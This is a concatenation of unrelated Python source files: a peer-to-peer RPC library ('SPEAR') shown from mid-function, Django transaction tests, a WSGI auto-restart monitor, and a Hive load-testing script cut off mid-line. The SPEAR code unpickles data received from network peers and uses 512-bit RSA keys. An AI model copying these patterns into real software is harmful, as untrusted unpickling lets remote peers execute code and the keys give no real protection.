self.peers.keys()} finals = {r: results[r].result() for r in results.keys()} for f in finals.keys(): if finals[f]['result_status'] == 200: finals[f] = pickle.loads(base64.urlsafe_b64decode(finals[f]['result'].encode('utf-8'))) else: finals[f] = { 'result': 'ERROR', 'status': finals[f]['result_status'], 'reason': finals[f]['result'] } if len(finals.keys()) == 1: return finals[list(finals.keys())[0]] else: return finals class PeerNotFoundError(KeyError): pass class SpearResponse: def __init__(self, status, data): self.status = status self.data = data class Spear: # Base Peer class def __init__( self, network_name, peer_name, relays=[], network_encryption=None, advertising_port=2200, port_range=(2300, 23000), use_remote=True, use_local=True, advertise=True ): self.network_name = network_name self.name = peer_name for i in range(len(relays)): if not ':' in relays[i]: relays[i] = relays[i] + ':2201' self.relays = {i: { 'last_reply': time.time(), 'public_key': None } for i in relays} self.ad_port = advertising_port self.id = hashlib.sha256( str(time.time() + random.uniform(-1, 1)).encode('utf-8')).hexdigest() while True: p = random.randint(*port_range) if not check_port(p): self.service_port = p break if network_encryption == None: self.network_encryption = False else: if type(network_encryption) == str: self.network_encryption = Fernet( network_encryption.encode('utf-8')) else: self.network_encryption = Fernet(network_encryption) self.endpoints = {} self.sockets = {} (self.public, self.private) = rsa.newkeys(512) self.running = False self.peers = { 'local': {}, 'remote': {} } self.threads = {} self.responses = {} self.use_local = use_local self.use_remote = use_remote self.advertise = advertise def find_peer(self, peer_name_or_id): if peer_name_or_id in self.peers['local'].keys(): return self.peers['local'][peer_name_or_id] elif peer_name_or_id in self.peers['remote'].keys(): return self.peers['remote'][peer_name_or_id] for p in self.peers['local'].values(): if p['name'] == peer_name_or_id: return p for p in self.peers['remote'].values(): if p['name'] == peer_name_or_id: return p raise PeerNotFoundError( f'Peer with name/ID "{peer_name_or_id}" not found.') def target(self, path): # Function decorator to specify commands def dec_target(func): self.endpoints[path] = func @functools.wraps(func) def wrapper_target(*args, **kwargs): return func(*args, **kwargs) return wrapper_target return dec_target def run_advertiser(self): # Local UDP advertiser thread self.sockets['advertiser'] = socket(AF_INET, SOCK_DGRAM) self.sockets['advertiser'].setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) self.sockets['advertiser'].bind(('', 0)) self.sockets['advertiser'].setsockopt(SOL_SOCKET, SO_BROADCAST, 1) while self.running: raw_packet = '§'.join([str(i) for i in [ self.network_name, self.id, self.name, ip() + ':' + str(self.service_port), base64.urlsafe_b64encode( self.public.save_pkcs1()).decode('utf-8'), ','.join(self.relays) ]]) if self.network_encryption: finished_packet = ('e§'+base64.urlsafe_b64encode(self.network_encryption.encrypt( raw_packet.encode('utf-8'))).decode('utf-8')+'\n').encode('utf-8') else: finished_packet = ('d§'+raw_packet+'\n').encode('utf-8') self.sockets['advertiser'].sendto( finished_packet, ( '<broadcast>', self.ad_port ) ) time.sleep(1) self.sockets['advertiser'].close() def discover_local_loop(self): # Local discovery thread s = socket(AF_INET, SOCK_DGRAM) s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) s.bind(('', self.ad_port)) while self.running: data, addr = s.recvfrom(1024) data = data.decode('utf-8') if not data.endswith('\n'): continue if data.startswith('e§'): try: proc_packet = self.network_encryption.decrypt(base64.urlsafe_b64decode( data.split('e§')[1].strip('\n').encode('utf-8'))).decode('utf-8').split('§') except InvalidToken: continue else: proc_packet = data.split('§', maxsplit=1)[1].strip().split('§') for i in proc_packet[5].split(','): if not i in self.relays.keys(): if ':' in i: r_ip = i else: r_ip = i + ':2201' self.relays[r_ip] = { 'last_reply': time.time(), 'public_key': None } if proc_packet[1] == self.id or proc_packet[0] != self.network_name: continue proc_packet = { 'id': proc_packet[1], 'name': proc_packet[2], 'network': proc_packet[0], 'address': proc_packet[3], 'public_key': rsa.PublicKey.load_pkcs1(base64.urlsafe_b64decode(proc_packet[4].encode('utf-8'))), 'ping_time': time.time(), 'type': 'local' } self.peers['local'][proc_packet['id']] = proc_packet.copy() def check_peer_timeouts(self): # Peer timeout thread while self.running: for k in list(self.peers['local'].keys()): if self.peers['local'][k]['ping_time'] + 2 < time.time(): del self.peers['local'][k] for k in list(self.peers['remote'].keys()): for r in self.peers['remote'][k]['relays'][:]: if self.relays[r]['last_reply'] + 2 < time.time(): self.peers['remote'][k]['relays'].remove(r) if len(self.peers['remote'][k]['relays']) == 0: del self.peers['remote'][k] time.sleep(1) def process_message(self, message): if self.network_encryption: message = self.network_encryption.decrypt( base64.urlsafe_b64decode(message)).decode('utf-8') else: message = message.decode('utf-8') key, data = message.split('§', maxsplit=1) tempfernet = Fernet(rsa.decrypt( base64.urlsafe_b64decode(key.encode('utf-8')), self.private)) data = json.loads(base64.urlsafe_b64decode(tempfernet.decrypt( base64.urlsafe_b64decode(data.encode('utf-8')))).decode('utf-8')) data['args'] = [pickle.loads(base64.urlsafe_b64decode( arg.encode('utf-8'))) for arg in data['args']] data['kwargs'] = {k: pickle.loads(base64.urlsafe_b64decode( data['kwargs'][k].encode('utf-8'))) for k in data['kwargs'].keys()} if data['path'] in self.endpoints.keys(): try: aspec = inspect.getfullargspec(self.endpoints[data['path']]) # I see you <3 if 'node' in aspec.kwonlyargs or aspec.varkw: data['kwargs']['node'] = self if 'originator' in aspec.kwonlyargs or aspec.varkw: data['kwargs']['originator'] = [data['originator'], data['originator_name']] value = self.endpoints[data['path']](*data['args'], **data['kwargs']) if type(value) == SpearResponse: status = value.status value = value.data else: status = 200 return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': status, 'result': base64.urlsafe_b64encode(pickle.dumps(value)).decode('utf-8') } except: return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': 500, 'result': f'Remote function encountered an unexpected error: {traceback.format_exc()}' } else: return_data = { 'type': 'response', 'originator': self.id, 'originator_name': self.name, 'originator_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'target': data['originator'], 'result_status': 404, 'result': f'Path "{data["path"]}" not found.' } encoded_response = base64.urlsafe_b64encode(json.dumps(return_data).encode('utf-8')) encrypted_response = tempfernet.encrypt(encoded_response) packed_response = base64.urlsafe_b64encode(encrypted_response) if self.network_encryption: packed_response = base64.urlsafe_b64encode(self.network_encryption.encrypt(packed_response)) return packed_response def check_one_relay(self, relay): # Function to check individual relays if not relay in self.relays.keys(): return if self.relays[relay]['last_reply'] + 2 < time.time(): self.relays[relay]['public_key'] = None if ':' in relay: host = relay.split(':')[0] port = int(relay.split(':')[1]) else: host = relay port = 2201 if self.relays[relay]['public_key'] == None: try: sock = create_connection((host, port), timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return sock.sendall(b'RSAREQUEST\n') while True: dat = sock.recv(1024) if not dat: break dat = dat.strip() try: self.relays[relay]['public_key'] = rsa.PublicKey.load_pkcs1( base64.urlsafe_b64decode(dat)) break except: pass sock.close() try: sock = create_connection((host, port), timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return packet = json.dumps({ 'peer_id': self.id, 'peer_name': self.name, 'network': self.network_name, 'public_key': base64.urlsafe_b64encode(self.public.save_pkcs1()).decode('utf-8'), 'relays': list(self.relays.keys()), 'advertise': self.advertise }) packet = 'PING:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.relays[relay]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) packet_response = '' while True: dat = sock.recv(1024) if not dat: break packet_response += dat.decode('utf-8').strip() if packet_response == 'error': self.relays[relay]['public_key'] = None return decrypted = tempfernet.decrypt( base64.urlsafe_b64decode(packet_response.encode('utf-8'))) processed = json.loads(decrypted) for r in processed['relays']: if not r in self.relays.keys(): if ':' in r: r_ip = r else: r_ip = r + ':2201' self.relays[r_ip] = { 'last_reply': time.time(), 'public_key': None } for p in processed['peers'].keys(): if not p in self.peers['remote'] and p != self.id: self.peers['remote'][p] = { 'id': p, 'name': processed['peers'][p][0], 'network': self.network_name, 'public_key': rsa.PublicKey.load_pkcs1(base64.urlsafe_b64decode(processed['peers'][p][1])), 'relays': [relay], 'type': 'remote' } elif p in self.peers['remote'] and not relay in self.peers['remote'][p]['relays']: self.peers['remote'][p]['relays'].append(relay) to_process = [] while len(processed['buffer']) > 0: item = processed['buffer'].pop() if item['type'] == 'resp': self.responses[item['id']] = item.copy() else: to_process.append(item.copy()) with ThreadPoolExecutor() as executor: [executor.submit(self.process_single_remote_message, m, relay) for m in to_process] self.relays[relay]['last_reply'] = time.time() sock.close() def process_single_remote_message(self, message, relay): mid = message['id'] origin = message['originator'] data = message['data'].encode('utf-8') response_message = self.process_message(data) try: sock = create_connection([relay.split(':')[0], int(relay.split(':')[1])], timeout=2) except TimeoutError: self.relays[relay]['public_key'] = None return packet = json.dumps({ 'originator': self.id, 'target': origin, 'network': self.network_name, 'id': mid, 'data': response_message.decode('utf-8') }) packet = 'RESP:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.relays[relay]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) sock.close() def check_relays(self): # Relay checker thread while self.running: with ThreadPoolExecutor() as executor: [executor.submit(self.check_one_relay, r) for r in list(self.relays.keys())] async def handle_local_connections(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter): data = await reader.readline() message = data.strip() response = self.process_message(message) + b'\n' writer.write(response) await writer.drain() writer.close() async def run_local_server(self): self.server = await asyncio.start_server(self.handle_local_connections, ip(), self.service_port) async with self.server: await self.server.serve_forever() def peer(self, target='*'): return Peer(self, target=target) def serve_forever(self): # Run SPEAR self.running = True if self.advertise and self.use_local: self.threads['advertiser'] = threading.Thread( target=self.run_advertiser, daemon=True ) if self.use_local: self.threads['discoverer'] = threading.Thread( target=self.discover_local_loop, daemon=True ) self.threads['peer_check'] = threading.Thread( target=self.check_peer_timeouts, daemon=True ) if self.use_remote: self.threads['relay_check'] = threading.Thread( target=self.check_relays, daemon=True ) if self.use_local: self.threads['local_server'] = threading.Thread( target=asyncio.run, args=[self.run_local_server()], daemon=True ) [t.start() for t in self.threads.values()] def close(self): self.running = False
tests.py
import sys import threading import time from unittest import skipIf, skipUnless from django.db import ( DatabaseError, Error, IntegrityError, OperationalError, connection, transaction, ) from django.test import ( TestCase, TransactionTestCase, skipIfDBFeature, skipUnlessDBFeature, ) from .models import Reporter @skipUnlessDBFeature('uses_savepoints') class AtomicTests(TransactionTestCase): """ Tests for the atomic decorator and context manager. The tests make assertions on internal attributes because there isn't a robust way to ask the database for its current transaction state. Since the decorator syntax is converted into a context manager (see the implementation), there are only a few basic tests with the decorator syntax and the bulk of the tests use the context manager syntax. """ available_apps = ['transactions'] def test_decorator_syntax_commit(self): @transaction.atomic def make_reporter(): return Reporter.objects.create(first_name="Tintin") reporter = make_reporter() self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_decorator_syntax_rollback(self): @transaction.atomic def make_reporter(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") with self.assertRaisesMessage(Exception, "Oops"): make_reporter() self.assertSequenceEqual(Reporter.objects.all(), []) def test_alternate_decorator_syntax_commit(self): @transaction.atomic() def make_reporter(): return Reporter.objects.create(first_name="Tintin") reporter = make_reporter() self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_alternate_decorator_syntax_rollback(self): @transaction.atomic() def make_reporter(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") with self.assertRaisesMessage(Exception, "Oops"): make_reporter() self.assertSequenceEqual(Reporter.objects.all(), []) def test_commit(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_nested_commit_commit(self): with transaction.atomic(): reporter1 = Reporter.objects.create(first_name="Tintin") with transaction.atomic(): reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_nested_commit_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_nested_rollback_commit(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with transaction.atomic(): Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_nested_rollback_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_commit_commit(self): with transaction.atomic(): reporter1 = Reporter.objects.create(first_name="Tintin") with transaction.atomic(savepoint=False): reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_merged_commit_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") # Writes in the outer block are rolled back too. self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_rollback_commit(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with transaction.atomic(savepoint=False): Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_rollback_rollback(self): with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(): Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_reuse_commit_commit(self): atomic = transaction.atomic() with atomic: reporter1 = Reporter.objects.create(first_name="Tintin") with atomic: reporter2 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_reuse_commit_rollback(self): atomic = transaction.atomic() with atomic: reporter = Reporter.objects.create(first_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") self.assertSequenceEqual(Reporter.objects.all(), [reporter]) def test_reuse_rollback_commit(self): atomic = transaction.atomic() with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(last_name="Tintin") with atomic: Reporter.objects.create(last_name="Haddock") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_reuse_rollback_rollback(self): atomic = transaction.atomic() with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(last_name="Tintin") with self.assertRaisesMessage(Exception, "Oops"): with atomic: Reporter.objects.create(first_name="Haddock") raise Exception("Oops, that's his last name") raise Exception("Oops, that's his first name") self.assertSequenceEqual(Reporter.objects.all(), []) def test_force_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") # atomic block shouldn't rollback, but force it. self.assertFalse(transaction.get_rollback()) transaction.set_rollback(True) self.assertSequenceEqual(Reporter.objects.all(), []) def test_prevent_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") sid = transaction.savepoint() # trigger a database error inside an inner atomic without savepoint with self.assertRaises(DatabaseError): with transaction.atomic(savepoint=False): with connection.cursor() as cursor: cursor.execute( "SELECT no_such_col FROM transactions_reporter") # prevent atomic from rolling back since we're recovering manually self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) transaction.savepoint_rollback(sid) self.assertSequenceEqual(Reporter.objects.all(), [reporter]) class AtomicInsideTransactionTests(AtomicTests): """All basic tests for atomic should also pass within an existing transaction.""" def setUp(self): self.atomic = transaction.atomic() self.atomic.__enter__() def tearDown(self): self.atomic.__exit__(*sys.exc_info()) class AtomicWithoutAutocommitTests(AtomicTests): """All basic tests for atomic should also pass when autocommit is turned off.""" def setUp(self): transaction.set_autocommit(False) def tearDown(self): # The tests access the database after exercising 'atomic', initiating # a transaction ; a rollback is required before restoring autocommit. transaction.rollback() transaction.set_autocommit(True) @skipUnlessDBFeature('uses_savepoints') class AtomicMergeTests(TransactionTestCase): """Test merging transactions with savepoint=False.""" available_apps = ['transactions'] def test_merged_outer_rollback(self): with transaction.atomic(): Reporter.objects.create(first_name="Tintin") with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Archibald", last_name="Haddock") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Calculus") raise Exception("Oops, that's his last name") # The third insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The second insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The first block has a savepoint and must roll back. self.assertSequenceEqual(Reporter.objects.all(), []) def test_merged_inner_savepoint_rollback(self): with transaction.atomic(): reporter = Reporter.objects.create(first_name="Tintin") with transaction.atomic(): Reporter.objects.create(first_name="Archibald", last_name="Haddock") with self.assertRaisesMessage(Exception, "Oops"): with transaction.atomic(savepoint=False): Reporter.objects.create(first_name="Calculus") raise Exception("Oops, that's his last name") # The third insert couldn't be roll back. Temporarily mark the # connection as not needing rollback to check it. self.assertTrue(transaction.get_rollback()) transaction.set_rollback(False) self.assertEqual(Reporter.objects.count(), 3) transaction.set_rollback(True) # The second block has a savepoint and must roll back. self.assertEqual(Reporter.objects.count(), 1) self.assertSequenceEqual(Reporter.objects.all(), [reporter]) @skipUnlessDBFeature('uses_savepoints') class AtomicErrorsTests(TransactionTestCase): available_apps = ['transactions'] forbidden_atomic_msg = "This is forbidden when an 'atomic' block is active." def test_atomic_prevents_setting_autocommit(self): autocommit = transaction.get_autocommit() with transaction.atomic(): with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.set_autocommit(not autocommit) # Make sure autocommit wasn't changed. self.assertEqual(connection.autocommit, autocommit) def test_atomic_prevents_calling_transaction_methods(self): with transaction.atomic(): with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.commit() with self.assertRaisesMessage(transaction.TransactionManagementError, self.forbidden_atomic_msg): transaction.rollback() def test_atomic_prevents_queries_in_broken_transaction(self): r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") with transaction.atomic(): r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) # The transaction is marked as needing rollback. msg = ( "An error occurred in the current transaction. You can't " "execute queries until the end of the 'atomic' block." ) with self.assertRaisesMessage(transaction.TransactionManagementError, msg): r2.save(force_update=True) self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Haddock") @skipIfDBFeature('atomic_transactions') def test_atomic_allows_queries_after_fixing_transaction(self): r1 = Reporter.objects.create(first_name="Archibald", last_name="Haddock") with transaction.atomic(): r2 = Reporter(first_name="Cuthbert", last_name="Calculus", id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) # Mark the transaction as no longer needing rollback. transaction.set_rollback(False) r2.save(force_update=True) self.assertEqual(Reporter.objects.get(pk=r1.pk).last_name, "Calculus") @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_atomic_prevents_queries_in_broken_transaction_after_client_close(self): with transaction.atomic(): Reporter.objects.create(first_name="Archibald", last_name="Haddock") connection.close() # The connection is closed and the transaction is marked as # needing rollback. This will raise an InterfaceError on databases # that refuse to create cursors on closed connections (PostgreSQL) # and a TransactionManagementError on other databases. with self.assertRaises(Error): Reporter.objects.create(first_name="Cuthbert", last_name="Calculus") # The connection is usable again . self.assertEqual(Reporter.objects.count(), 0) @skipUnless(connection.vendor == 'mysql', "MySQL-specific behaviors") class AtomicMySQLTests(TransactionTestCase): available_apps = ['transactions'] @skipIf(threading is None, "Test requires threading") def test_implicit_savepoint_rollback(self): """MySQL implicitly rolls back savepoints when it deadlocks (#22291).""" Reporter.objects.create(id=1) Reporter.objects.create(id=2) main_thread_ready = threading.Event() def other_thread(): try: with transaction.atomic(): Reporter.objects.select_for_update().get(id=1) main_thread_ready.wait() # 1) This line locks... (see below for 2) Reporter.objects.exclude(id=1).update(id=2) finally: # This is the thread-local connection, not the main connection. connection.close() other_thread = threading.Thread(target=other_thread) other_thread.start() with self.assertRaisesMessage(OperationalError, 'Deadlock found'): # Double atomic to enter a transaction and create a savepoint. with transaction.atomic(): with transaction.atomic(): Reporter.objects.select_for_update().get(id=2) main_thread_ready.set() # The two threads can't be synchronized with an event here # because the other thread locks. Sleep for a little while. time.sleep(1) # 2) ... and this line deadlocks. (see above for 1) Reporter.objects.exclude(id=2).update(id=1) other_thread.join() class AtomicMiscTests(TransactionTestCase): available_apps = ['transactions'] def test_wrap_callable_instance(self): """#20028 -- Atomic must support wrapping callable instances.""" class Callable: def __call__(self): pass # Must not raise an exception transaction.atomic(Callable()) @skipUnlessDBFeature('can_release_savepoints') def test_atomic_does_not_leak_savepoints_on_failure(self): """#23074 -- Savepoints must be released after rollback.""" # Expect an error when rolling back a savepoint that doesn't exist. # Done outside of the transaction block to ensure proper recovery. with self.assertRaises(Error): # Start a plain transaction. with transaction.atomic(): # Swallow the intentional error raised in the sub-transaction. with self.assertRaisesMessage(Exception, "Oops"): # Start a sub-transaction with a savepoint. with transaction.atomic(): sid = connection.savepoint_ids[-1] raise Exception("Oops") # This is expected to fail because the savepoint no longer exists. connection.savepoint_rollback(sid) def test_mark_for_rollback_on_error_in_transaction(self): with transaction.atomic(savepoint=False): # Swallow the intentional error raised. with self.assertRaisesMessage(Exception, "Oops"): # Wrap in `mark_for_rollback_on_error` to check if the transaction is marked broken. with transaction.mark_for_rollback_on_error(): # Ensure that we are still in a good state. self.assertFalse(transaction.get_rollback()) raise Exception("Oops") # Ensure that `mark_for_rollback_on_error` marked the transaction as broken … self.assertTrue(transaction.get_rollback()) # … and further queries fail. msg = "You can't execute queries until the end of the 'atomic' block." with self.assertRaisesMessage(transaction.TransactionManagementError, msg): Reporter.objects.create() # Transaction errors are reset at the end of an transaction, so this should just work. Reporter.objects.create() def test_mark_for_rollback_on_error_in_autocommit(self): self.assertTrue(transaction.get_autocommit()) # Swallow the intentional error raised. with self.assertRaisesMessage(Exception, "Oops"): # Wrap in `mark_for_rollback_on_error` to check if the transaction is marked broken. with transaction.mark_for_rollback_on_error(): # Ensure that we are still in a good state. self.assertFalse(transaction.get_connection().needs_rollback) raise Exception("Oops") # Ensure that `mark_for_rollback_on_error` did not mark the transaction # as broken, since we are in autocommit mode … self.assertFalse(transaction.get_connection().needs_rollback) # … and further queries work nicely. Reporter.objects.create() class NonAutocommitTests(TransactionTestCase): available_apps = [] def setUp(self): transaction.set_autocommit(False) def tearDown(self): transaction.rollback() transaction.set_autocommit(True) def test_orm_query_after_error_and_rollback(self): """ ORM queries are allowed after an error and a rollback in non-autocommit mode (#27504). """ r1 = Reporter.objects.create(first_name='Archibald', last_name='Haddock') r2 = Reporter(first_name='Cuthbert', last_name='Calculus', id=r1.id) with self.assertRaises(IntegrityError): r2.save(force_insert=True) transaction.rollback() Reporter.objects.last() def test_orm_query_without_autocommit(self): """#24921 -- ORM queries must be possible after set_autocommit(False).""" Reporter.objects.create(first_name="Tintin") class DurableTestsBase: available_apps = ['transactions'] def test_commit(self): with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin') self.assertEqual(Reporter.objects.get(), reporter) def test_nested_outer_durable(self): with transaction.atomic(durable=True): reporter1 = Reporter.objects.create(first_name='Tintin') with transaction.atomic(): reporter2 = Reporter.objects.create( first_name='Archibald', last_name='Haddock', ) self.assertSequenceEqual(Reporter.objects.all(), [reporter2, reporter1]) def test_nested_both_durable(self): msg = 'A durable atomic block cannot be nested within another atomic block.' with transaction.atomic(durable=True): with self.assertRaisesMessage(RuntimeError, msg): with transaction.atomic(durable=True): pass def test_nested_inner_durable(self): msg = 'A durable atomic block cannot be nested within another atomic block.' with transaction.atomic(): with self.assertRaisesMessage(RuntimeError, msg): with transaction.atomic(durable=True): pass def test_sequence_of_durables(self): with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin 1') self.assertEqual(Reporter.objects.get(first_name='Tintin 1'), reporter) with transaction.atomic(durable=True): reporter = Reporter.objects.create(first_name='Tintin 2') self.assertEqual(Reporter.objects.get(first_name='Tintin 2'), reporter) class DurableTransactionTests(DurableTestsBase, TransactionTestCase): pass class DurableTests(DurableTestsBase, TestCase): pass
monitor.py
""" Restart the WSGI daemon process in development when files have changed. """ import atexit import os import queue import signal import sys import threading __author__ = 'Alex Laird' __copyright__ = 'Copyright 2018, Alex Laird' __version__ = '0.2.3' _interval = 1.0 _times = {} _files = [] _running = False _queue = queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print(f'{prefix} Change detected to "{path}".') print(f'{prefix} Triggering process restart.') os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except: # If any exception occurred, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): while 1: # Check modification times on all files in sys.modules. for module in list(sys.modules.values()): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except: pass _thread.join() atexit.register(_exiting) def track(path): if path not in _files: _files.append(path) def start(interval=0.5): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: print(f'Monitoring codebase for changes: (pid={os.getpid()})') _running = True _thread.start() _lock.release()
hive_commands.py
#!/usr/bin/env python ''' Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import datetime import threading import time import random from audit_logger import AuditLogger from config import Config from optparse import OptionParser from system_requests import SystemRequests def main(): parser = OptionParser(usage="Usage: %prog [options]") parser.add_option("-d", "--days", dest="no_of_days", type="int", help="[REQUIRED] Number of days to run this script") parser.add_option("-t", "--threads", dest="no_of_threads", default=1, type="int", help="Number of thread count") parser.add_option("-e", "--execution", dest="no_of_execution", default=1000, type="int", help="Number of execution count") (options, args) = parser.parse_args() if options.no_of_days is None: options.no_of_days = int(raw_input('Enter number of days to run this script:')) if options.no_of_threads is None: options.no_of_threads = int(raw_input('Enter number of of thread count:')) if options.no_of_execution is None: options.no_of_execution = int(raw_input('Enter number of execution count:')) current_time = datetime.datetime.now() end_time = current_time + datetime.timedelta(days=options.no_of_days) system_requests = SystemRequests('hive') machine_config = Config() user_list = machine_config.get('hive', 'user_list', 'hive,ambari-qa,hdfs') user_list = user_list.split(",") while datetime.datetime.now() < end_time: thread_list = [] for i in range(0, options.no_of_threads): for j in range(0, len(user_list)): t = threading.Thread(target=execute, args=(system_requests, machine_config, user_list[j], options.no_of_execution,)) thread_list.append(t) for thread in thread_list: thread.start() for thread in thread_list: thread.join() def execute(system_requests, machine_config, user, no_of_execution): for i in range(0, no_of_execution): security_enabled = machine_config.get('cluster', 'security', False) user = machine_config.get(user, 'user', user) principal = machine_config.get(user, 'principal', None) keytab = machine_config.get(user, 'keytab', None) hive_jdbc_url = machine_config.get('hive', 'hive_jdbc_url', None) database = machine_config.get('hive', 'database', 'default') random_numbers = random.randint(100000000000,999999999999) sleep_time = machine_config.get('hive', 'sleep_time', '10') kinit_command = "" if security_enabled == 'True': kinit_command = "/usr/bin/kinit -kt {0} {1};".format(keytab, principal) hive_command = "{0} /usr/bin/beeline -u '{1}' -n {2} -p {3} -d org.apache.hive.jdbc.HiveDriver -e 'use {4};'".format(kinit_command, 